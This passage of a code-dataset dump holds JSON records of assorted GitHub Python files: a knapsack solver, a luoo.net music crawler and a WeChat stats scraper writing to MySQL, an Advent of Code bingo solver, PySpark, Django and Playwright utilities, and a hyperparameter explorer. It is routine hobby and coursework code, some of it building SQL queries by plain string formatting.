c1=capacity\r\n while(capacity>0):\r\n m=pw.index(max(pw))\r\n if capacity>weight[m]:\r\n max_value+=value[m]\r\n capacity-=weight[m]\r\n items_taken.append(obj[m])\r\n weights_taken.append(weight[m])\r\n pw[m]=0.0\r\n else:\r\n max_value+=(capacity*value[m])/weight[m]\r\n weights_taken.append(capacity)\r\n capacity-=capacity\r\n items_taken.append(obj[m])\r\n pw[m]=0.0\r\n return max_value\r\n\r\nitems_taken=[]\r\nweights_taken=[]\r\nobj=list(map(str,input('list of items : ').split()))\r\nvalue=list(map(int,input('Corresponding values : ').split()))\r\nweight=list(map(int,input('Corresponding weights : ').split()))\r\ncapacity=int(input('capacity : '))\r\nmax_value=knapsack(obj,value,weight,capacity)\r\nprint(\"maximum profit obtained with given capacity from given list of items with corresponding profits and weights is\",max_value)\r\nprint(\"items taken :\",items_taken)\r\nprint(\"weights are :\",weights_taken)\r\n\r\n'''\r\nA B C D E F G H\r\n10 5 15 7 6 18 3 45\r\n2 3 5 7 1 4 1 16\r\n15\r\n'''","repo_name":"bvsslgayathri-8679/sem","sub_path":"sem4 pdfs/DAA lab/week6/fractional_knapsack.py","file_name":"fractional_knapsack.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7582725616","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n# Created on 2018-01-07 04:24:53\n# Project: luoo-mysql\n\nfrom pyspider.libs.base_handler import *\nimport re\nimport pymysql.cursors\n\n\n# connection = pymysql.connect(\n# host='127.0.0.1',\n# port=3306,\n# user='root',\n# db='music'\n# )\n#\n# cursor = connection.cursor()\n\n\nclass DBHelper:\n def __init__(self):\n self.connection = pymysql.connect(\n host='127.0.0.1',\n port=3306,\n user='root',\n db='music',\n use_unicode=True,\n charset=\"utf8\"\n )\n self.table_vol = 'vol'\n self.table_track = 'track'\n self.cursor = self.connection.cursor()\n\n def execute_sql(self, sql):\n try:\n self.cursor.execute(sql)\n self.connection.commit()\n finally:\n self.connection.close()\n\n def insert(self, table, tdict):\n column = ''\n value = ''\n\n for key in tdict:\n if tdict[key] is not None:\n column += \",\" + key\n value += \"\\\",\\\"\" + tdict[key]\n\n sql = 'INSERT INTO %s (%s) VALUES (%s)' % (table, column, value)\n\n print(sql)\n\n try:\n self.cursor.execute(sql)\n self.connection.commit()\n\n last_id = self.cursor.lastrowid\n\n print(last_id)\n\n return last_id\n finally:\n self.connection.close()\n\n def update(self, table, condition, tdict):\n column = ''\n value = ''\n for key in condition:\n column += \",%s=\\\"%s\\\"\" % (key, condition[key])\n\n for key in tdict:\n value += \", %s=\\\"%s\\\"\" % (key, tdict[key])\n\n column = column[1:]\n value = value[1:]\n\n sql = 'UPDATE %s SET %s WHERE %s' % (table, value, column)\n\n print(sql)\n\n self.execute_sql(sql)\n\n def save_or_update(self, table, tdict):\n column = ''\n value = ''\n update = ''\n for key in tdict:\n if tdict[key] is not None:\n column += \",\" + key\n value += \"\\\",\\\"\" + tdict[key]\n update += \",\" + key + \"=\\\"\" + tdict[key] + \"\\\"\"\n\n column = column[1:]\n value = value[2:] + \"\\\"\"\n update = update[1:]\n\n sql = 'INSERT INTO %s (%s) VALUES (%s) ON DUPLICATE KEY UPDATE %s' % (table, column, value, update)\n\n print(sql)\n\n self.cursor.execute(sql)\n self.connection.commit()\n\n last_id = self.cursor.lastrowid\n\n # self.cursor.close()\n\n def batch_save_or_update(self, table, tlist):\n columns = []\n values = []\n updates = []\n\n for tdict in 
tlist:\n column = ''\n value = ''\n update = ''\n\n for key in tdict:\n if tdict[key] is not None:\n column += \",\" + key\n value += \"\\\",\\\"\" + tdict[key]\n update += \",\" + key + \"=VALUES(\" + key + \")\"\n\n columns.append(\"(\" + column[1:] + \")\")\n values.append(\"(\" + value[2:] + \"\\\"\" + \")\")\n updates.append(update[1:])\n\n print(updates)\n\n sql = 'INSERT INTO %s %s VALUES %s ON DUPLICATE KEY UPDATE %s' % (table, columns[0], \",\".join(values),\n updates[0])\n\n print(sql)\n\n self.cursor.execute(sql)\n self.connection.commit()\n\n last_id = self.cursor.lastrowid\n\n # self.cursor.close()\n\ndb_helper = DBHelper()\n\ndata = dict(\n vol_id='123',\n vol_number='123',\n url='123',\n title='123',\n description='changed',\n cover='cover changed',\n vol_prev='123',\n vol_next='23',\n)\n\n\nTRACK_URL_PREFIX = 'http://mp3-cdn2.luoo.net/low/luoo/radio'\n\nHOST = 'www.luoo.net'\nREFERER = 'http://www.luoo.net'\nUSER_AGENT = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36'\nHTTP_HEADERS = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, sdch',\n 'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6',\n 'Connection': 'keep-alive',\n 'DNT': '1',\n 'Host': HOST,\n 'Referer': REFERER,\n 'User-Agent': USER_AGENT,\n}\n\n\nclass Handler(BaseHandler):\n retry_delay = {\n 0: 12 * 60 * 60,\n '': 24 * 60 * 60\n }\n crawl_config = {\n 'headers': {\n 'User-Agent': USER_AGENT,\n },\n 'auto_crawl': True,\n 'itag': 'v0.1.1',\n }\n\n @every(minutes=24 * 60)\n def on_start(self):\n self.crawl('http://www.luoo.net/tag/?p=1', callback=self.index_page)\n\n @config(age=10 * 24 * 60 * 60)\n def index_page(self, response):\n\n # 详情页面\n for each in response.doc('a[href^=\"http://www.luoo.net/vol/index/\"]').items():\n self.crawl(each.attr.href, callback=self.detail_page)\n\n for each in response.doc('a[href^=\"http://www.luoo.net/tag/?p=\"]').items():\n self.crawl(each.attr.href, callback=self.index_page)\n\n @config(priority=2)\n def detail_page(self, response):\n vol_id = response.doc('.btn-action-like').attr['data-id']\n vol_number = response.doc('.vol-number').text()\n tags = []\n track_list = []\n\n for each in response.doc('.vol-tags').find('.vol-tag-item').items():\n tags.append(each.text())\n\n for each in response.doc('.track-item').items():\n order_and_name = re.search(r\"^(\\d+)\\.(.+)\", each.find('.trackname').text())\n\n track = {\n 'track_id': each.attr.id.replace('track', ''),\n 'vol_id': vol_id,\n 'order_id': str(int(order_and_name.group(1))),\n 'name': re.escape(order_and_name.group(2)),\n 'artist': re.escape(each.find('.player-wrapper > .artist').text().replace('Artist:', '').strip()),\n 'album': re.escape(each.find('.player-wrapper > .album').text().replace('Album:', '').strip()),\n 'cover': each.find('.player-wrapper > .cover').attr.src,\n 'url': TRACK_URL_PREFIX + str(vol_number) + '/' + order_and_name.group(1) + '.mp3'\n }\n\n\n track_list.append(track)\n\n db_helper.batch_save_or_update(db_helper.table_track, track_list)\n\n track_list_id = []\n\n # track_id 存入 list\n for track in track_list:\n track_list_id.append(str(track['track_id']))\n\n track_list_id = \",\".join(track_list_id)\n\n result = {\n 'vol_id': vol_id,\n 'vol_number': vol_number,\n 'url': response.url,\n 'title': re.escape(response.doc('title').text()),\n 'description': re.escape(response.doc('.vol-desc').html().strip()),\n 'cover': response.doc('.vol-cover').attr.src,\n 'vol_prev': 
response.doc('.nav-prev').attr.href,\n 'vol_next': response.doc('.nav-next').attr.href,\n 'created_at': response.doc('.vol-date').html().strip(),\n 'track_list_id': track_list_id,\n 'tags': re.escape(\",\".join(tags)),\n }\n\n db_helper.save_or_update(db_helper.table_vol, result)\n\n return result\n\n @catch_status_code_error\n def callback(self, response):\n # if response\n print(response)\n pass\n\n\n\n\n","repo_name":"zhanglun/pureloser","sub_path":"spider/luoo/luowang-mysql.py","file_name":"luowang-mysql.py","file_ext":"py","file_size_in_byte":7343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71927270762","text":"def win(board):\n for row in board:\n if all(i[1] == -1 for i in row): return True\n for col in zip(*board):\n if all(i[1] == -1 for i in col): return True\n return False\n\ndef solve1(lines):\n a = list(lines)\n numbers = [*map(int, a.pop(0).split(\",\"))]\n a.pop(0)\n b = '\\n'.join(a).split(\"\\n\\n\")\n boards = [ [list(map(lambda x: [int(x), int(x)],j.split())) for j in i.split(\"\\n\")] for i in b]\n\n for i in numbers:\n for x in range(len(boards)):\n for y in range(len(boards[x])):\n for z in range(len(boards[x][y])):\n if boards[x][y][z][1] == i: boards[x][y][z][1] = -1\n\n for b in boards:\n if win(b):\n return i*sum(sum(i[0] for i in row if i[0]==i[1]) for row in b)\n\ndef solve2(lines):\n a = list(lines)\n numbers = [*map(int, a.pop(0).split(\",\"))]\n a.pop(0)\n b = '\\n'.join(a).split(\"\\n\\n\")\n boards = [ [list(map(lambda x: [int(x), int(x)],j.split())) for j in i.split(\"\\n\")] for i in b]\n\n found = False\n for i in numbers:\n for x in range(len(boards)):\n for y in range(len(boards[x])):\n for z in range(len(boards[x][y])):\n if boards[x][y][z][1] == i: boards[x][y][z][1] = -1\n\n if not found:\n states = [win(b) for b in boards]\n if states.count(0) == 1:\n found = True\n ind = states.index(0)\n elif win(boards[ind]):\n return i*sum(sum(i[0] for i in row if i[0]==i[1]) for row in boards[ind])\n\n\n\nimport sys\nlines = [l.rstrip('\\n') for l in sys.stdin]\nprint(\"\\033[96m\\033[1m[*] PART 1:\", solve1(lines), \"\\033[0m\")\nprint(\"\\033[92m\\033[1m[*] PART 2:\", solve2(lines), \"\\033[0m\")","repo_name":"dnzc/AdventOfCode","sub_path":"2021/day04.py","file_name":"day04.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28154185961","text":"def lol(l,a,s):\r\n\tfor i in range(0,len(l)):\r\n\t\tif i == a:\r\n\t\t\tdel l[i]\r\n\tif len(l) < s+1 :\r\n\t\treturn l \r\n\t\t\r\n\ta=l[a]\r\n\tfor x in l:\r\n\t\tprint(x, end=\" \")\r\n\tprint()\r\n\t\r\n\tlol(l,a-1,s)\r\n\r\n\r\ns =int (input(\"enter you'r lucky number:\"))\r\nl=list()\r\nfor i in range(1,100):\r\n\tl.append(i)\r\n'''for i in l:\r\n\tprint(i, end=\" \")\r\nprint()'''\r\na =1\r\nlucky = lol(l,a,s)\r\nfor i in l:\r\n\tprint(i,end=\" \")\r\n\r\n","repo_name":"3vilbird/machinelearning","sub_path":"intern/lucky.py","file_name":"lucky.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"35496078200","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql import Row\nfrom pyspark.sql import functions\n\ndef loadMovieNames():\n movieNames = {}\n with open(\"ml-100k/u.items\") as f:\n for line in f:\n fields = line.split('|')\n movieNames[int(fields[0])] = fields[1]\n return movieNames\n\ndef parseInput(line):\n fields = 
line.split()\n # (movieID, (ratings, 1.0))\n return Row(movieID = int(fields[1]), rating = float(fields[2]))\n\nif __name__ == \"__main__\":\n\n # Create a Spark Session\n # getOrCreate() either creates a new session or gets the older session that was not stopped previously\n spark = SparkSession.builder.enableHiveSupport().appName(\"WorstMovies\").getOrCreate()\n \n # creating a dictionary that creates mapping of movie ID to movie name\n movieNames = loadMovieNames()\n\n # get the raw data\n lines = spark.sparkContext.textFile(\"hdfs:///user/maria_dev/ml-100k/u.data\")\n # converting the data into RDD of row objects (movieID, rating)\n movies = lines.map(parseInput)\n # converting the row objects into DataFrame\n movieDataset = spark.createDataFrame(movies)\n\n # computing the average of the ratings of each movie ID\n averageRatings = movieDataset.groupBy(\"movieID\").avg(\"rating\")\n\n # computing the counts of ratings for each movie ID\n counts = movieDataset.groupBy(\"movieID\").count()\n\n # only choosing those ratings that are being rated by more than 10 people\n counts = counts.filter(\"count > 10\")\n\n # joining both the averageRatings and counts dataset over movieID\n averageAndCounts = counts.join(averageRatings, \"movieID\")\n\n # taking the top 10 results\n results = averageAndCounts.orderBy(\"avg(rating)\").take(10)\n\n # Display the results, by mapping the movieID to movie name\n for res in results:\n print(movieNames[res[0]], res[1], res[2])\n\n # Stopping the Spark session\n spark.stop()","repo_name":"santhosh96/BigData","sub_path":"Spark/LowestAverageRatingDataframe.py","file_name":"LowestAverageRatingDataframe.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39314492927","text":"from django.dispatch import receiver\nfrom django.db.models.signals import post_save, post_delete\nfrom django.utils.text import slugify\nfrom .models import Product\nfrom frontend.models import CategorySite\nfrom .models import SizeAttribute\n\n\n@receiver(post_save, sender=Product)\ndef create_product_slug(sender, instance, **kwargs):\n if not instance.slug:\n new_slug = slugify(instance.title, allow_unicode=True)\n qs_exists = Product.objects.filter(slug=new_slug)\n if qs_exists.exists():\n new_slug = f'{new_slug}-{instance.id}'\n instance.slug = new_slug\n instance.save()\n\n \n@receiver(post_save, sender=CategorySite)\ndef create_category_slug(sender, instance, **kwargs):\n if not instance.slug:\n new_slug = slugify(instance.name, allow_unicode=True)\n qs_exists = Product.objects.filter(slug=new_slug)\n if qs_exists.exists():\n new_slug = f'{new_slug}-{instance.id}'\n instance.slug = new_slug\n instance.save()\n\n\n@receiver(post_delete, sender=SizeAttribute)\ndef delete_size_attribute(sender, instance, **kwargs):\n product = instance.product_related\n product.qty -= instance.qty\n product.save()","repo_name":"Zefarak/my_shop","sub_path":"products/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2398130070","text":"\"\"\"Instantiate a playwright chrominium browser.\n\nRespect PWBROWSER_ environ variables in .env\n\"\"\"\n#\n\nfrom typing import Union, Optional\n\n# from playwright.async_api import async_playwright, Browser\nfrom playwright.sync_api import sync_playwright, Browser\nfrom get_pwbrowser.config import Settings\n\nimport logzero\nfrom 
logzero import logger\n\nconfig = Settings()\nHEADLESS = not config.headful\nDEBUG = config.debug\nPROXY = config.proxy\n\n\n# fmt: off\ndef get_pwbrowser(\n headless: bool = HEADLESS,\n verbose: Union[bool, int] = DEBUG,\n proxy: Optional[Union[str, dict]] = PROXY,\n **kwargs\n) -> Browser:\n # fmt: on\n \"\"\"Instantiate a playwright chrominium browser (sync).\n\n mainly for scraping google translate where a page is reused\n hence, the sync version of get_pwbrowser makes more sense\n\n if isinstance(verbose, bool):\n verbose = 10 if verbose else 20\n logzero.loglevel(verbose)\n\n browser = get_browser(headless)\n context = browser.newContext()\n page = context.newPage()\n page.goto('https://httpbin.org/ip') https://httpbin.org/ip\n # https://getfoxyproxy.org/geoip/\n # http://whatsmyuseragent.org/\n https://playwright.dev/python/docs/intro/\n\n proxy setup: https://playwright.dev/python/docs/network?_highlight=proxy#http-proxy\n browser = chromium.launch(proxy={\n \"server\": \"http://myproxy.com:3128\",\n \"user\": \"usr\",\n \"password\": \"pwd\"\n })\n https://scrapingant.com/blog/how-to-use-a-proxy-in-playwright\n chrominium\n const launchOptions = {\n args: [ '--proxy-server=http://222.165.235.2:80' ]\n };\n browser = await playwright['chromium'].launch(launchOptions)\n\n os.environ['PWBROWSER_HEADFUL'] = 'true'\n\n headless: bool = HEADLESS\n headless: bool = False\n verbose: Union[bool, int] = DEBUG\n proxy: Optional[Union[str, dict]] = PROXY\n kwargs = {}\n \"\"\"\n if isinstance(verbose, bool):\n verbose = 10 if verbose else 20\n logzero.loglevel(verbose)\n\n kwargs.update({\n \"headless\": headless,\n })\n\n if proxy:\n proxy = {\"server\": proxy}\n kwargs.update({\n \"proxy\": proxy,\n })\n\n try:\n playwright = sync_playwright().start()\n except Exception as exc:\n logger.error(exc)\n raise\n\n try:\n browser = playwright.chromium.launch(**kwargs)\n # browser = playwright.chromium.launch(headless=False)\n except Exception as exc:\n logger.error(exc)\n raise\n\n return browser\n","repo_name":"ffreemt/get-pwbrowser","sub_path":"get_pwbrowser/get_pwbrowser.py","file_name":"get_pwbrowser.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1285755798","text":"from utils.my_mysql_add import MySql\r\nfrom settings import mysql_info, run_time\r\nimport time\r\nfrom datetime import datetime, timedelta\r\nfrom get_ci_data import *\r\nfrom loguru import logger\r\n\r\nfrom apscheduler.schedulers.background import BlockingScheduler\r\n\r\n\r\ncoon = MySql()\r\n__coon = MySql(mysql_info, 'sys_pinghu_wx_article_info')\r\n\r\n\r\ndef select_wx_content(news_id):\r\n datetime_yestoday = (datetime.now() - timedelta(days=4)).strftime('%Y-%m-%d')\r\n datetime_now = datetime.now().strftime('%Y-%m-%d')\r\n # sql = f\"\"\"-- select title, url, sn, idx, read_count, look_count, good_count, news_time from sys_wx_contents_temp where news_id={news_id} and create_time BETWEEN '{datetime_yestoday} 00:00:00' and '{datetime_now} 00:00:00' \"\"\"\r\n sql = f\"\"\"select title, url, sn, idx, read_count, look_count, good_count, news_time from sys_wx_contents_temp where news_id={news_id} and create_time BETWEEN '{datetime_yestoday} 00:00:00' and '{datetime_now} 00:00:00' \"\"\"\r\n results = coon.getAll(sql)\r\n # print(333333,results)\r\n return results\r\n\r\n\r\n# def select_pinghu_wx_info(sn):\r\n# sql = f\"\"\"select read_count, looking_count, good_count, wci from sys_pinghu_wx_info where article_id={sn} 
order by create_time desc limit 1\"\"\"\r\n# result = __coon.getOne(sql)\r\n# return result\r\n\r\ndef select_pinghu_wx_info(sn):\r\n sql = f\"\"\"select read_count, looking_count, good_count, wci from sys_pinghu_wx_article_info where article_id='{sn}' order by create_time desc limit 1\"\"\"\r\n result = __coon.getOne(sql)\r\n # print(6666,result)\r\n return result\r\n\r\n\r\ndef select_best(news_id, yesterday_start_time, yesterday_end_time):\r\n sql = f\"\"\"select news_id from sys_pinghu_wx_article_info where news_id ={news_id} and create_time BETWEEN {yesterday_start_time} and {yesterday_end_time} \"\"\"\r\n results = __coon.getOne(sql)\r\n return results\r\n\r\n\r\n\r\ndef change_(item):\r\n keys_ = item.keys()\r\n for i in keys_:\r\n if item[i] == None:\r\n item[i] = 0\r\n return item\r\n\r\n\r\ndef pinghu_start():\r\n spider_data, spider_yestoday_data, yesterday_start_time, yesterday_end_time = run_time()\r\n\r\n pinghu_id_list = ['1149', '1150', '1151', '1152', '1153', '1154', '1155', '1156', '1157', '1158', '1159', '1160',\r\n '1161', '1162', '1163', '1164', '1165', '1166', '1167', '1168', '1169', '1170', '1171', '1172',\r\n '1173', '1174', '1175', '1176', '1177', '1178', '1179', '1180', '1181', '1182', '1183', '1184',\r\n '1185', '1186', '1187', '1188', '1189', '1190', '1191', '1192', '1193', '1194', '1195', '1196',\r\n '1197', '1198', '1199', '1200', '1201', '1202', '1203', '1204', '1205', '1206', '1207', '1208',\r\n '1209', '1210', '1211', '1212', '1213']\r\n for pinghu_id in pinghu_id_list:\r\n # print(1111,pinghu_id)\r\n results_data = select_wx_content(pinghu_id)\r\n if select_best(pinghu_id, yesterday_start_time, yesterday_end_time):\r\n __coon.delete(pinghu_id, yesterday_start_time, yesterday_end_time)\r\n logger.info('更新完成')\r\n # print(22222,results_data)\r\n if results_data:\r\n for result_data in results_data:\r\n # print(55555,result_data)\r\n item = dict()\r\n title, url, sn, idx, read_count, look_count, good_count, news_time = result_data\r\n item[\"news_id\"] = pinghu_id\r\n item[\"article_id\"] = sn\r\n item[\"read_count\"] = read_count\r\n item[\"good_count\"] = good_count\r\n item[\"looking_count\"] = look_count\r\n item[\"adapter_type\"] = 'ls'\r\n item[\"create_time\"] = int(time.time() * 1000)\r\n item[\"title\"] = title\r\n item[\"url\"] = url\r\n item[\"news_time\"] = news_time\r\n if idx == 1:\r\n item['is_top'] = 1\r\n else:\r\n item['is_top'] = 0\r\n best_data = select_pinghu_wx_info(sn)\r\n change_(item)\r\n if best_data:\r\n old_read_count, old_looking_count, old_good_count, wci = best_data\r\n item[\"read_count_change\"] = read_count - old_read_count\r\n item[\"good_count_change\"] = good_count - old_good_count\r\n item[\"looking_count_change\"] = look_count - old_looking_count\r\n item[\"wci\"] = get_wci_ph(item)\r\n item[\"wci_change\"] = item[\"wci\"] - wci\r\n else:\r\n item[\"read_count_change\"] = 0\r\n item[\"good_count_change\"] = 0\r\n item[\"looking_count_change\"] = 0\r\n item[\"wci\"] = get_wci_ph(item)\r\n item[\"wci_change\"] = 0\r\n # print(item)\r\n __coon.insert(item)\r\n # return item\r\n\r\n\r\nif __name__ == '__main__':\r\n print(4444)\r\n pinghu_start()\r\n\r\n scheduler = BlockingScheduler(timezone='Asia/Shanghai')\r\n scheduler.add_job(pinghu_start, 'cron', hour='9', minute='30')\r\n scheduler.add_job(pinghu_start, 'cron', hour='14', minute='30')\r\n 
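# --- illustrative aside (not part of this repository) ---
# The queries above interpolate values into SQL with f-strings; a hedged
# sketch of the same lookup using pymysql's parameter binding, which quotes
# values safely. The connection argument is assumed to be a pymysql
# connection; table and column names follow the code above.
def select_latest_article_info(connection, sn):
    sql = ("select read_count, looking_count, good_count, wci "
           "from sys_pinghu_wx_article_info where article_id=%s "
           "order by create_time desc limit 1")
    with connection.cursor() as cursor:
        cursor.execute(sql, (sn,))   # the driver escapes the parameter
        return cursor.fetchone()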
scheduler.start()\r\n","repo_name":"2783785013/-","sub_path":"dy_wb_wx/PingHu_wx.py","file_name":"PingHu_wx.py","file_ext":"py","file_size_in_byte":5202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70032883245","text":"from django.utils.functional import Promise\n\nfrom django.conf import settings\n\nfrom django.test import SimpleTestCase\nfrom jaad.exceptions import exception_handler\nfrom rest_framework.exceptions import ValidationError\n\n\nclass RendererTests(SimpleTestCase):\n maxDiff = None\n\n def test_that_exception_handler_handle_unexpected_exception(self):\n exception = KeyError(\"Bad key detected\")\n\n handled_exception = self.handle_exception(exception, None, debug_value=False)\n\n self.assertEqual(\n {\n \"status_code\": 500,\n \"message\": \"An internal error occurred.\",\n \"more_info\": \"Contact the administrator of the application.\",\n },\n handled_exception.data,\n )\n self.assertEqual(500, handled_exception.status_code)\n\n def test_that_exception_handler_handle_expected_exception(self):\n exception = ValidationError(detail=\"Bad format for the field name\")\n\n response_for_exception = self.handle_exception(\n exception, None, debug_value=False\n )\n\n self.assertEqual(\n {\n \"status_code\": 400,\n \"message\": \"Invalid input.\",\n \"more_info\": [\"Bad format for the field name\"],\n },\n self.get_proxied_value(response_for_exception.data),\n )\n self.assertEqual(400, response_for_exception.status_code)\n\n def handle_exception(self, exception, context, debug_value):\n previous_debug_value = settings.DEBUG\n settings.DEBUG = debug_value\n returned_value = exception_handler(exception, context)\n settings.DEBUG = previous_debug_value\n return returned_value\n\n def get_proxied_value(self, some_dict):\n return {\n key: value._proxy____cast() if isinstance(value, Promise) else value\n for key, value in some_dict.items()\n }\n","repo_name":"AmadeusITGroup/jaad","sub_path":"jaad/tests/test_exceptions.py","file_name":"test_exceptions.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44440379313","text":"from functools import partial\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.sparse as sp\nimport re\n\nimport pandas as pd\n\n\nclass HyperparameterExplorer:\n def __init__(self, X, y, classifier, score_name, primary_hyperparameter,\n validation_split=0.1, test_X=None, test_y=None,\n # only used for final training on all of the training data.\n assess_test_data_during_fitting=True,\n use_prev_best_weights=False):\n\n # check data\n assert X.shape[0] == y.shape[0]\n # Sometimes we check the loss of test_X and test_y during fitting\n if test_X is None and test_y is None:\n print(\"No test data was provided.\")\n if test_X is not None and test_y is not None:\n assert test_X.shape[0] == test_y.shape[0]\n\n # model_partial is a model that's missing one or more parameters.\n self.all_training_X = X # reserved for final training after hyper sweep.\n self.all_training_y = y # reserved for final training after hyper sweep.\n self.N, self.d = X.shape\n self.summary = pd.DataFrame()\n self.primary_hyperparameter = primary_hyperparameter\n\n # split off a validation set from X\n split_index = int(self.N*(1-validation_split))\n print(\"{} of {} points from training are reserved for \"\n \"validation\".format(self.N - split_index, self.N))\n self.train_X = X[0:split_index, :]\n self.validation_X 
= X[split_index:, :]\n self.train_y = y[0:split_index]\n self.validation_y = y[split_index:]\n print('variances of all training data: {}'.format(np.var(y)))\n print('variances of split-off training & validation '\n 'data: {}, {}'.format(np.var(self.train_y),\n np.var(self.validation_y)))\n\n if test_X is not None and test_y is not None:\n self.assess_test_data_during_fitting = assess_test_data_during_fitting\n self.test_X = test_X\n self.test_y = test_y\n self.model = partial(classifier,\n X=self.train_X, y=self.train_y,\n test_X=test_X, test_y=test_y)\n else:\n self.model = partial(classifier, X=self.train_X, y=self.train_y)\n\n # keep track of model numbers.\n self.num_models = 0\n self.models = {}\n\n # the score that will be used to determine which model is best.\n self.training_score_name = score_name\n self.score_name = re.sub(\"training\", \"\", score_name)\n self.validation_score_name = re.sub(\"training\", \"validation\", score_name)\n self.use_prev_best_weights = use_prev_best_weights\n\n def train_model(self, kernel_kwargs, model_kwargs, assess_test_data_during_fitting=False):\n # train model\n # check that model was made\n try:\n model_kwargs['assess_test_data_during_fitting'] = assess_test_data_during_fitting\n m = self.model(kernel_kwargs=kernel_kwargs, **model_kwargs)\n # set weights to the best found so far\n # Note: this is silly for non-iterative solvers like Ridge.\n if self.use_prev_best_weights and self.summary.shape[0] >=1:\n print('Starting with best weights from previous model(s)')\n best_weights = self.best('weights')\n if best_weights is not None:\n m.replace_weights(best_weights.copy())\n\n except NameError:\n print(\"model construction failed for {}\".format(**model_kwargs))\n\n self.num_models += 1\n self.model_number = self.num_models\n m.run()\n # save outcome of fit. 
Includes training data 0/1 loss, etc.\n        self.models[self.num_models] = m\n        print(\"saved as model # {}\".format(self.num_models))\n\n        # Check if model converged, and assess it if so\n        if m.converged:\n            print(\"Model converged; assess it using validation data.\")\n\n        # assess the model even if it didn't converge\n        self.assess_model(m)\n        print(\"Model training & assessment completed.\")\n\n    def assess_model(self, model):\n        m = model\n        # get results\n        outcome = m.results.tail(1).reset_index()\n        if len(outcome) < 1:\n            print(\"model didn't work..?\")\n        # Save the model number so we can look up the model later\n        outcome['model number'] = [self.num_models]\n        outcome['converged'] = [m.converged]\n        print('{}:{}'.format(self.training_score_name,\n                             outcome[self.training_score_name][0]))\n\n        validation_results = m.apply_model(X=self.validation_X,\n                                           y=self.validation_y,\n                                           data_name='validation')\n        validation_results = pd.DataFrame(validation_results)\n        v_columns = [c for c in validation_results.columns\n                     if 'validation' in c or self.primary_hyperparameter == c]\n        outcome = pd.merge(pd.DataFrame(outcome),\n                           validation_results[v_columns])\n\n        # Append this new model's findings onto the summary of earlier models.\n        self.summary = pd.concat([self.summary, outcome])\n        # Oh, silly Pandas:\n        self.summary.reset_index(drop=True, inplace=True)\n\n        # Plot log loss vs time if applicable.\n        try:\n            m.plot_loss_normalized_and_eta()\n            m.plot_W_hat_history()\n        except:\n            print(\"not all plotting calls worked.\")\n\n    def best(self, value='model'):\n        \"\"\"\n        Find the best model according to the validation data\n        via the Pandas DataFrame.\n\n        :param value: a string describing what you want from the best model.\n        \"\"\"\n        # get the index of the model with the best score\n        i = self.summary[[self.validation_score_name]].idxmin()[0]\n        i = self.summary['model number'][i]\n        if value == 'model number':\n            return i\n\n        summary_row = self.summary[self.summary['model number'] == i]\n        if value == 'summary':\n            return summary_row.T\n\n        best_score = summary_row[self.validation_score_name]\n        if value == 'score':\n            return best_score\n\n        model = self.models[i]\n        if value == 'model':\n            return model\n\n        if value == 'weights':\n            return model.get_weights()\n\n        print(\"best {} = {}; found in model {}\".format(\n            self.validation_score_name, best_score, i))\n        return model\n\n    def best_results_across_hyperparams(self):\n        \"\"\"\n        Group summary results by lambda and return a summary of the best\n        validation score result for each lambda tested so far.\n        \"\"\"\n        if self.summary.shape[0] == 0:\n            return None\n        # best losses at each lambda:\n        p = self.primary_hyperparameter\n        idx = self.summary.groupby([p])[self.validation_score_name].\\\n            transform(min) == self.summary[self.validation_score_name]\n        return self.summary[idx]\n\n    def plot_fits(self, df=None, x=None, y1=None, y2=None,\n                  filename=None, xlim=None, ylim=None, logx=False):\n        if x is None:\n            x = self.primary_hyperparameter\n        if df is None:\n            df = self.summary\n        if y1 is None:\n            y1 = self.validation_score_name\n        if y2 is None:\n            y2 = self.training_score_name\n        fig, ax = plt.subplots(1, 1, figsize=(4, 3))\n        plot_data = df.sort_values(x)\n        if logx:\n            plt.semilogx(plot_data[x], plot_data[y1], label=y1,\n                         linestyle='--', marker='o', c='g')\n            plt.semilogx(plot_data[x], plot_data[y2], label=y2,\n                         linestyle='--', marker='o', c='grey')\n        else:\n            plt.plot(plot_data[x], plot_data[y1], label=y1,\n                     linestyle='--', marker='o', c='g')\n            plt.plot(plot_data[x], plot_data[y2], label=y2,\n                     linestyle='--', marker='o', c='grey')\n\n        plt.legend(loc='best')\n        
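# --- illustrative aside (not part of this repository) ---
# best() above picks the row with the minimal validation score via idxmin; a
# tiny standalone illustration of that pandas pattern (the column names and
# values here are made up for the example):
import pandas as pd

df = pd.DataFrame({"model number": [1, 2, 3],
                   "validation loss": [0.4, 0.2, 0.9]})
best_idx = df["validation loss"].idxmin()      # index of the smallest loss
print(df.loc[best_idx, "model number"])        # -> 2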
